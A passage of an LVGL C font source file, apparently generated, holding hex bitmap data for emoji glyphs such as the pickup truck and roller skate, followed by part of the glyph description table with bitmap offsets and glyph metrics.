0xff, 0xff, 0xff, 0xff, 0xff, 0xc0, 0x7f, 0xe1,
0xc0, 0xe, 0x0, 0x0, 0x0, 0xf, 0xf0, 0x7,
0xfc, 0x38, 0x1, 0xc0, 0x0, 0x0, 0x1, 0xfc,
0x0, 0x7f, 0x8e, 0x0, 0x1c, 0x0, 0x0, 0x0,
0x3f, 0x80, 0x7, 0xf1, 0xc0, 0x3, 0x80, 0x0,
0x0, 0x0, 0xe0, 0x0, 0xe0, 0x38, 0x0, 0x70,
0x0, 0x0, 0x0, 0x1c, 0x0, 0x1c, 0x7, 0x0,
0xe, 0x0, 0x0, 0x0, 0x3, 0x80, 0x3, 0x80,
0xe0, 0x1, 0xc0, 0x0, 0x0, 0x0, 0x70, 0x0,
0x70, 0x1c, 0x0, 0x78, 0x0, 0x0, 0x0, 0x7,
0x0, 0x1e, 0x1, 0xc0, 0xe, 0x0, 0x0, 0x0,
0x0, 0xf0, 0x3, 0x80, 0x3c, 0x3, 0xc0, 0x0,
0x0, 0x0, 0x1e, 0x0, 0xf0, 0x3, 0xe1, 0xf0,
0x0, 0x0, 0x0, 0x1, 0xf0, 0x7c, 0x0, 0x3f,
0xfc, 0x0, 0x0, 0x0, 0x0, 0x1f, 0xff, 0x0,
0x3, 0xff, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff,
0xc0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x0, 0x0,
0x7, 0xe0, 0x0,
/* U+1F6FB "🛻" */
0x0, 0x0, 0x0, 0x3f, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0xff, 0xff, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1c, 0x0,
0x7, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x18, 0x0, 0x1, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe1, 0xff, 0xc7,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xf,
0xff, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x30, 0x1c, 0x70, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x61, 0xc0, 0x71, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0x86, 0x1, 0xc7, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xc, 0x38, 0x7,
0x1c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x70,
0xc0, 0x1c, 0x70, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0x87, 0x0, 0x71, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0x18, 0x1, 0xc7, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x30, 0xe0, 0x7, 0x1c,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xc3, 0x0,
0x1c, 0x70, 0x0, 0x0, 0x0, 0x0, 0x0, 0x6,
0x1c, 0x0, 0x71, 0xc0, 0x0, 0x0, 0x0, 0x0,
0xff, 0xf8, 0x70, 0x1, 0xc7, 0x0, 0x0, 0x0,
0x0, 0xf, 0xff, 0xc3, 0xff, 0xff, 0x1f, 0xff,
0xff, 0xff, 0xf0, 0x7f, 0xff, 0xf, 0xff, 0xfc,
0x7f, 0xff, 0xff, 0xff, 0xe1, 0xc0, 0x0, 0x0,
0x0, 0x1, 0xc0, 0x0, 0x0, 0x1, 0x87, 0x0,
0x0, 0x0, 0x0, 0x7, 0x0, 0x0, 0x0, 0x6,
0x1f, 0x80, 0x0, 0x0, 0x0, 0x1c, 0x0, 0x0,
0x0, 0x1c, 0x7f, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x1, 0xf1, 0xcc, 0x0, 0x0, 0x0,
0x1, 0xc0, 0x0, 0x0, 0xf, 0xc7, 0x18, 0x0,
0x0, 0x0, 0x7, 0x0, 0x0, 0x0, 0x3f, 0x1c,
0x60, 0x0, 0x0, 0x0, 0x1c, 0x0, 0x0, 0x0,
0xfc, 0x71, 0x80, 0x0, 0x0, 0x0, 0x70, 0x0,
0x0, 0x3, 0xf1, 0xc6, 0x0, 0x0, 0x0, 0x1,
0xc0, 0x0, 0x0, 0xf, 0xc7, 0x18, 0x0, 0x0,
0x0, 0x7, 0x0, 0x0, 0x0, 0x3f, 0x1c, 0x60,
0x0, 0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0xfc,
0x7f, 0x80, 0x0, 0x0, 0x0, 0x70, 0x0, 0x0,
0x0, 0x71, 0xfe, 0x0, 0x0, 0x0, 0x1, 0xc0,
0x0, 0x0, 0x1, 0xc7, 0x0, 0xff, 0xe0, 0x0,
0x7, 0x0, 0xf, 0xff, 0xff, 0x1c, 0xf, 0xff,
0xc0, 0x0, 0x1c, 0x0, 0xff, 0xff, 0xfc, 0x38,
0x7f, 0xff, 0x80, 0x0, 0x70, 0x3, 0xff, 0xff,
0xf3, 0xff, 0xff, 0xff, 0x0, 0x1, 0xc0, 0x1f,
0xff, 0xff, 0xff, 0xff, 0xf1, 0xfe, 0x0, 0x7,
0x0, 0x7f, 0x1f, 0xff, 0xff, 0xff, 0x1, 0xf8,
0x0, 0x1c, 0x3, 0xf0, 0x1f, 0xff, 0xff, 0xf8,
0x3, 0xf0, 0x0, 0x70, 0xf, 0x80, 0x3f, 0xff,
0xff, 0xc0, 0x7, 0xe0, 0x1, 0xc0, 0x7c, 0x0,
0x7f, 0xff, 0xff, 0x0, 0x1f, 0xff, 0xff, 0xff,
0xf0, 0x1, 0xff, 0xff, 0xfc, 0x0, 0x7f, 0xff,
0xff, 0xff, 0xc0, 0x7, 0xfe, 0x0, 0x70, 0x1,
0xc0, 0x0, 0x0, 0x7, 0x0, 0x1c, 0x0, 0x1,
0xc0, 0x7, 0x0, 0x0, 0x0, 0x1c, 0x0, 0x70,
0x0, 0x7, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x78,
0x3, 0xc0, 0x0, 0xe, 0x1, 0xe0, 0x0, 0x0,
0x0, 0xf0, 0x1e, 0x0, 0x0, 0x3e, 0xf, 0x0,
0x0, 0x0, 0x1, 0xe0, 0xf0, 0x0, 0x0, 0x7f,
0xfc, 0x0, 0x0, 0x0, 0x7, 0xff, 0xc0, 0x0,
0x0, 0xff, 0xc0, 0x0, 0x0, 0x0, 0x7, 0xfc,
0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0, 0x0,
0x7, 0xe0, 0x0,
/* U+1F6FC "🛼" */
0x0, 0x0, 0x7, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0xff, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xfe, 0x0, 0x0, 0x0,
0x0, 0x0, 0xff, 0xff, 0x80, 0x70, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0x0, 0x1, 0xc6, 0x0,
0x0, 0x0, 0x0, 0x70, 0x0, 0xc, 0xf, 0xf8,
0x0, 0x0, 0x0, 0x3, 0x80, 0xf, 0xf3, 0xff,
0x80, 0x0, 0x0, 0x0, 0xf, 0xff, 0xfe, 0x3f,
0xfc, 0x0, 0x0, 0x0, 0x0, 0x3f, 0xfc, 0x1,
0x9f, 0xe0, 0x0, 0x0, 0x0, 0x3, 0x80, 0x0,
0xc, 0x3f, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0,
0x3, 0x70, 0xfb, 0xe0, 0x0, 0x0, 0x1, 0xe0,
0x1, 0xfd, 0xf3, 0xff, 0x80, 0x0, 0x0, 0x7,
0xf, 0xff, 0xc7, 0xff, 0xe, 0x0, 0x0, 0x0,
0x1f, 0xff, 0xf0, 0x1f, 0xf0, 0x30, 0x0, 0x0,
0x0, 0xff, 0xf8, 0x0, 0xff, 0xc1, 0x80, 0x0,
0x0, 0xe, 0x0, 0x0, 0x7, 0xff, 0x1c, 0x0,
0x0, 0x0, 0x70, 0x0, 0x0, 0x3f, 0xdf, 0xc0,
0x0, 0x0, 0x3, 0x80, 0x0, 0x30, 0xce, 0x3c,
0x0, 0x0, 0x0, 0x1c, 0x0, 0x7f, 0x80, 0x38,
0x0, 0x0, 0x0, 0x0, 0x7f, 0xff, 0xf0, 0x0,
0xe0, 0x0, 0x0, 0x0, 0x1, 0xff, 0xe0, 0x0,
0x3f, 0x80, 0x0, 0x0, 0x0, 0xc, 0x0, 0x0,
0x3, 0xff, 0x80, 0x0, 0x0, 0x0, 0x60, 0x0,
0x0, 0xe, 0x7c, 0x0, 0x0, 0x0, 0x3, 0xf0,
0x0, 0x0, 0x3, 0xf2, 0x0, 0x0, 0x0, 0x1f,
0xfc, 0x0, 0x0, 0x3f, 0xf0, 0x0, 0x0, 0x1,
0xff, 0xff, 0x0, 0x1, 0xef, 0x80, 0x0, 0x0,
0xe, 0x7f, 0xff, 0x0, 0xf, 0x1f, 0xf0, 0x0,
0x0, 0x70, 0xf, 0xfe, 0x0, 0x1, 0xbf, 0x80,
0x0, 0x3, 0x0, 0x1, 0xfc, 0x0, 0x1e, 0x7f,
0x0, 0x0, 0x18, 0x0, 0x1, 0xf0, 0x0, 0x61,
0xfe, 0x0, 0x1, 0xc0, 0x0, 0x3, 0xe0, 0x0,
0x1f, 0xfe, 0x0, 0xe, 0x0, 0x0, 0x7, 0x0,
0x0, 0xf1, 0xfc, 0x0, 0x7f, 0xff, 0x80, 0x1c,
0x0, 0x7, 0x83, 0xf0, 0x3, 0xff, 0xff, 0xc0,
0x70, 0x0, 0x0, 0x3, 0xe0, 0x1f, 0xff, 0xff,
0x83, 0x80, 0x0, 0x0, 0xf, 0x0, 0xff, 0xff,
0xfe, 0xe, 0x0, 0x0, 0x0, 0x3c, 0x7, 0xf0,
0x0, 0xfc, 0x30, 0x0, 0x0, 0x0, 0xf0, 0x38,
0x0, 0x0, 0xe1, 0xc0, 0x0, 0x0, 0x3, 0x80,
0xe0, 0x0, 0x3, 0x86, 0x0, 0x0, 0x0, 0x1c,
0x7, 0x0, 0x0, 0xe, 0x30, 0x0, 0x0, 0x0,
0xe0, 0x1c, 0x0, 0x0, 0x31, 0x80, 0x0, 0x0,
0x7, 0x0, 0xf0, 0x0, 0x1, 0xce, 0x0, 0x0,
0x0, 0x78, 0x3, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0x80, 0xf, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xf8, 0x0, 0x7f, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xc0, 0x3, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xfe, 0x0, 0xf, 0xff, 0xfc,
0x0, 0x3f, 0xff, 0xff, 0xf8, 0x0, 0x7f, 0xff,
0xc0, 0x1, 0xff, 0xff, 0x9f, 0xe0, 0x1, 0xff,
0xfe, 0x0, 0x7, 0xff, 0xf8, 0xff, 0x80, 0xf,
0xff, 0xe0, 0x0, 0x3f, 0xff, 0xc3, 0xfe, 0x0,
0x7f, 0xfe, 0x0, 0x0, 0xff, 0xfc, 0x1f, 0xf8,
0x3, 0xc3, 0xf0, 0x0, 0x7, 0xc1, 0xe0, 0xff,
0xe0, 0x3c, 0xf, 0x0, 0x0, 0x1c, 0x7, 0x83,
0xff, 0x83, 0xc0, 0x38, 0x0, 0x1, 0xc0, 0x1c,
0x1f, 0xf8, 0x1c, 0x0, 0xe0, 0x0, 0xc, 0x0,
0x70, 0x7f, 0x0, 0xe0, 0x7, 0x0, 0x0, 0x60,
0x3, 0x81, 0xf0, 0x7, 0x0, 0x38, 0x0, 0x3,
0x0, 0x1c, 0xf, 0x0, 0x38, 0x1, 0xc0, 0x0,
0x18, 0x0, 0xe0, 0x20, 0x1, 0xc0, 0xe, 0x0,
0x0, 0xc0, 0x7, 0x0, 0x0, 0xf, 0x0, 0xe0,
0x0, 0x7, 0x0, 0x70, 0x0, 0x0, 0x3c, 0xf,
0x0, 0x0, 0x1c, 0x7, 0x80, 0x0, 0x0, 0xf0,
0xf0, 0x0, 0x0, 0xf0, 0x78, 0x0, 0x0, 0x7,
0xff, 0x80, 0x0, 0x3, 0xff, 0xc0, 0x0, 0x0,
0x1f, 0xf8, 0x0, 0x0, 0xf, 0xfc, 0x0, 0x0,
0x0, 0x3f, 0x0, 0x0, 0x0, 0x1f, 0x80, 0x0,
0x0
};
/*---------------------
* GLYPH DESCRIPTION
*--------------------*/
static const lv_font_fmt_txt_glyph_dsc_t glyph_dsc[] = {
{.bitmap_index = 0, .adv_w = 0, .box_w = 0, .box_h = 0, .ofs_x = 0, .ofs_y = 0} /* id = 0 reserved */,
{.bitmap_index = 0, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 520, .adv_w = 1300, .box_w = 65, .box_h = 65, .ofs_x = 8, .ofs_y = -11},
{.bitmap_index = 1049, .adv_w = 1300, .box_w = 61, .box_h = 61, .ofs_x = 10, .ofs_y = -9},
{.bitmap_index = 1515, .adv_w = 1300, .box_w = 63, .box_h = 62, .ofs_x = 9, .ofs_y = -9},
{.bitmap_index = 2004, .adv_w = 1300, .box_w = 71, .box_h = 65, .ofs_x = 5, .ofs_y = -11},
{.bitmap_index = 2581, .adv_w = 0, .box_w = 1, .box_h = 1, .ofs_x = 0, .ofs_y = 0},
{.bitmap_index = 2582, .adv_w = 1300, .box_w = 65, .box_h = 65, .ofs_x = 8, .ofs_y = -11},
{.bitmap_index = 3111, .adv_w = 1300, .box_w = 68, .box_h = 65, .ofs_x = 6, .ofs_y = -11},
{.bitmap_index = 3664, .adv_w = 1300, .box_w = 74, .box_h = 65, .ofs_x = 3, .ofs_y = -11},
{.bitmap_index = 4266, .adv_w = 1300, .box_w = 62, .box_h = 64, .ofs_x = 10, .ofs_y = -10},
{.bitmap_index = 4762, .adv_w = 1300, .box_w = 51, .box_h = 64, .ofs_x = 15, .ofs_y = -10},
{.bitmap_index = 5170, .adv_w = 1300, .box_w = 62, .box_h = 64, .ofs_x = 9, .ofs_y = -10},
{.bitmap_index = 5666, .adv_w = 1300, .box_w = 66, .box_h = 64, .ofs_x = 7, .ofs_y = -10},
{.bitmap_index = 6194, .adv_w = 1300, .box_w = 73, .box_h = 65, .ofs_x = 4, .ofs_y = -11},
{.bitmap_index = 6788, .adv_w = 1300, .box_w = 66, .box_h = 66, .ofs_x = 8, .ofs_y = -11},
{.bitmap_index = 7333, .adv_w = 1300, .box_w = 66, .box_h = 66, .ofs_x = 8, .ofs_y = -11},
{.bitmap_index = 7878, .adv_w = 1300, .box_w = 66, .box_h = 65, .ofs_x = 8, .ofs_y = -11},
{.bitmap_index = 8415, .adv_w = 1300, .box_w = 48, .box_h = 64, .ofs_x = 17, .ofs_y = -10},
{.bitmap_index = 8799, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 9319, .adv_w = 1300, .box_w = 33, .box_h = 64, .ofs_x = 24, .ofs_y = -10},
{.bitmap_index = 9583, .adv_w = 1300, .box_w = 70, .box_h = 64, .ofs_x = 6, .ofs_y = -10},
{.bitmap_index = 10143, .adv_w = 1300, .box_w = 65, .box_h = 65, .ofs_x = 8, .ofs_y = -11},
{.bitmap_index = 10672, .adv_w = 1300, .box_w = 66, .box_h = 65, .ofs_x = 7, .ofs_y = -10},
{.bitmap_index = 11209, .adv_w = 1300, .box_w = 57, .box_h = 64, .ofs_x = 12, .ofs_y = -10},
{.bitmap_index = 11665, .adv_w = 1300, .box_w = 56, .box_h = 64, .ofs_x = 13, .ofs_y = -10},
{.bitmap_index = 12113, .adv_w = 1300, .box_w = 54, .box_h = 65, .ofs_x = 14, .ofs_y = -10},
{.bitmap_index = 12552, .adv_w = 1300, .box_w = 54, .box_h = 65, .ofs_x = 14, .ofs_y = -10},
{.bitmap_index = 12991, .adv_w = 1300, .box_w = 54, .box_h = 65, .ofs_x = 14, .ofs_y = -10},
{.bitmap_index = 13430, .adv_w = 1300, .box_w = 74, .box_h = 56, .ofs_x = 4, .ofs_y = -6},
{.bitmap_index = 13948, .adv_w = 1300, .box_w = 54, .box_h = 65, .ofs_x = 14, .ofs_y = -10},
{.bitmap_index = 14387, .adv_w = 1300, .box_w = 54, .box_h = 65, .ofs_x = 14, .ofs_y = -10},
{.bitmap_index = 14826, .adv_w = 1300, .box_w = 54, .box_h = 65, .ofs_x = 14, .ofs_y = -10},
{.bitmap_index = 15265, .adv_w = 1300, .box_w = 66, .box_h = 65, .ofs_x = 8, .ofs_y = -11},
{.bitmap_index = 15802, .adv_w = 1300, .box_w = 64, .box_h = 65, .ofs_x = 9, .ofs_y = -10},
{.bitmap_index = 16322, .adv_w = 1300, .box_w = 68, .box_h = 64, .ofs_x = 6, .ofs_y = -10},
{.bitmap_index = 16866, .adv_w = 1300, .box_w = 68, .box_h = 64, .ofs_x = 7, .ofs_y = -10},
{.bitmap_index = 17410, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 17930, .adv_w = 1300, .box_w = 65, .box_h = 46, .ofs_x = 8, .ofs_y = -1},
{.bitmap_index = 18304, .adv_w = 1300, .box_w = 69, .box_h = 64, .ofs_x = 6, .ofs_y = -10},
{.bitmap_index = 18856, .adv_w = 1300, .box_w = 61, .box_h = 64, .ofs_x = 10, .ofs_y = -10},
{.bitmap_index = 19344, .adv_w = 1300, .box_w = 68, .box_h = 64, .ofs_x = 7, .ofs_y = -10},
{.bitmap_index = 19888, .adv_w = 1300, .box_w = 75, .box_h = 65, .ofs_x = 3, .ofs_y = -10},
{.bitmap_index = 20498, .adv_w = 1300, .box_w = 61, .box_h = 64, .ofs_x = 10, .ofs_y = -10},
{.bitmap_index = 20986, .adv_w = 1300, .box_w = 61, .box_h = 64, .ofs_x = 10, .ofs_y = -10},
{.bitmap_index = 21474, .adv_w = 1300, .box_w = 60, .box_h = 67, .ofs_x = 11, .ofs_y = -11},
{.bitmap_index = 21977, .adv_w = 1300, .box_w = 70, .box_h = 49, .ofs_x = 6, .ofs_y = -3},
{.bitmap_index = 22406, .adv_w = 1300, .box_w = 71, .box_h = 40, .ofs_x = 5, .ofs_y = 2},
{.bitmap_index = 22761, .adv_w = 1300, .box_w = 56, .box_h = 64, .ofs_x = 12, .ofs_y = -10},
{.bitmap_index = 23209, .adv_w = 1300, .box_w = 67, .box_h = 52, .ofs_x = 7, .ofs_y = -10},
{.bitmap_index = 23645, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 24165, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 24685, .adv_w = 1300, .box_w = 67, .box_h = 52, .ofs_x = 7, .ofs_y = -10},
{.bitmap_index = 25121, .adv_w = 1300, .box_w = 50, .box_h = 64, .ofs_x = 15, .ofs_y = -10},
{.bitmap_index = 25521, .adv_w = 1300, .box_w = 68, .box_h = 53, .ofs_x = 6, .ofs_y = -5},
{.bitmap_index = 25972, .adv_w = 1300, .box_w = 67, .box_h = 56, .ofs_x = 7, .ofs_y = -6},
{.bitmap_index = 26441, .adv_w = 1300, .box_w = 39, .box_h = 64, .ofs_x = 21, .ofs_y = -10},
{.bitmap_index = 26753, .adv_w = 1300, .box_w = 64, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 27265, .adv_w = 1300, .box_w = 62, .box_h = 64, .ofs_x = 10, .ofs_y = -10},
{.bitmap_index = 27761, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 28281, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 28801, .adv_w = 1300, .box_w = 65, .box_h = 65, .ofs_x = 8, .ofs_y = -11},
{.bitmap_index = 29330, .adv_w = 1300, .box_w = 72, .box_h = 59, .ofs_x = 5, .ofs_y = -8},
{.bitmap_index = 29861, .adv_w = 1300, .box_w = 72, .box_h = 65, .ofs_x = 5, .ofs_y = -11},
{.bitmap_index = 30446, .adv_w = 1300, .box_w = 71, .box_h = 65, .ofs_x = 5, .ofs_y = -10},
{.bitmap_index = 31023, .adv_w = 1300, .box_w = 71, .box_h = 64, .ofs_x = 5, .ofs_y = -10},
{.bitmap_index = 31591, .adv_w = 1300, .box_w = 77, .box_h = 65, .ofs_x = 2, .ofs_y = -10},
{.bitmap_index = 32217, .adv_w = 1300, .box_w = 70, .box_h = 42, .ofs_x = 5, .ofs_y = 1},
{.bitmap_index = 32585, .adv_w = 1300, .box_w = 69, .box_h = 64, .ofs_x = 6, .ofs_y = -10},
{.bitmap_index = 33137, .adv_w = 1300, .box_w = 80, .box_h = 65, .ofs_x = 1, .ofs_y = -11},
{.bitmap_index = 33787, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 34307, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 34827, .adv_w = 1300, .box_w = 77, .box_h = 64, .ofs_x = 2, .ofs_y = -10},
{.bitmap_index = 35443, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 35963, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 36483, .adv_w = 1300, .box_w = 69, .box_h = 64, .ofs_x = 6, .ofs_y = -10},
{.bitmap_index = 37035, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 37555, .adv_w = 1300, .box_w = 62, .box_h = 64, .ofs_x = 10, .ofs_y = -10},
{.bitmap_index = 38051, .adv_w = 1300, .box_w = 70, .box_h = 66, .ofs_x = 6, .ofs_y = -10},
{.bitmap_index = 38629, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 39149, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 39669, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 40189, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 40709, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 41229, .adv_w = 1300, .box_w = 67, .box_h = 64, .ofs_x = 7, .ofs_y = -10},
{.bitmap_index = 41765, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 42285, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 42805, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 43325, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 43845, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 44365, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 44885, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 45405, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 45925, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 46445, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 46965, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 47485, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 48005, .adv_w = 1300, .box_w = 65, .box_h = 66, .ofs_x = 8, .ofs_y = -12},
{.bitmap_index = 48542, .adv_w = 1300, .box_w = 65, .box_h = 66, .ofs_x = 8, .ofs_y = -12},
{.bitmap_index = 49079, .adv_w = 1300, .box_w = 65, .box_h = 66, .ofs_x = 8, .ofs_y = -12},
{.bitmap_index = 49616, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 50136, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 50656, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 51176, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 51696, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 52216, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 52736, .adv_w = 1300, .box_w = 69, .box_h = 64, .ofs_x = 6, .ofs_y = -10},
{.bitmap_index = 53288, .adv_w = 1300, .box_w = 67, .box_h = 64, .ofs_x = 7, .ofs_y = -10},
{.bitmap_index = 53824, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 54344, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 54864, .adv_w = 1300, .box_w = 65, .box_h = 65, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 55393, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 55913, .adv_w = 1300, .box_w = 67, .box_h = 64, .ofs_x = 7, .ofs_y = -10},
{.bitmap_index = 56449, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 56969, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 57489, .adv_w = 1300, .box_w = 65, .box_h = 66, .ofs_x = 8, .ofs_y = -12},
{.bitmap_index = 58026, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 58546, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 59066, .adv_w = 1300, .box_w = 67, .box_h = 65, .ofs_x = 7, .ofs_y = -10},
{.bitmap_index = 59611, .adv_w = 1300, .box_w = 74, .box_h = 67, .ofs_x = 4, .ofs_y = -12},
{.bitmap_index = 60231, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 60751, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 61271, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 61791, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 62311, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 62831, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 63351, .adv_w = 1300, .box_w = 72, .box_h = 62, .ofs_x = 5, .ofs_y = -9},
{.bitmap_index = 63909, .adv_w = 1300, .box_w = 72, .box_h = 62, .ofs_x = 4, .ofs_y = -9},
{.bitmap_index = 64467, .adv_w = 1300, .box_w = 72, .box_h = 62, .ofs_x = 5, .ofs_y = -9},
{.bitmap_index = 65025, .adv_w = 1300, .box_w = 72, .box_h = 62, .ofs_x = 5, .ofs_y = -9},
{.bitmap_index = 65583, .adv_w = 1300, .box_w = 72, .box_h = 62, .ofs_x = 5, .ofs_y = -9},
{.bitmap_index = 66141, .adv_w = 1300, .box_w = 72, .box_h = 62, .ofs_x = 5, .ofs_y = -9},
{.bitmap_index = 66699, .adv_w = 1300, .box_w = 72, .box_h = 62, .ofs_x = 5, .ofs_y = -9},
{.bitmap_index = 67257, .adv_w = 1300, .box_w = 72, .box_h = 60, .ofs_x = 5, .ofs_y = -9},
{.bitmap_index = 67797, .adv_w = 1300, .box_w = 72, .box_h = 62, .ofs_x = 5, .ofs_y = -9},
{.bitmap_index = 68355, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 68875, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 69395, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 69915, .adv_w = 1300, .box_w = 65, .box_h = 64, .ofs_x = 8, .ofs_y = -10},
{.bitmap_index = 70435, .adv_w = 1300, .box_w = 74, .box_h = 55, .ofs_x = 4, .ofs_y = -6},
{.bitmap_index = 70944, .adv_w = 1300, .box_w = 69, .box_h = 64, .ofs_x = 6, .ofs_y = -10},
{.bitmap_index = 71496, .adv_w = 1300, .box_w = 77, .box_h = 61, .ofs_x = 2, .ofs_y = -9},
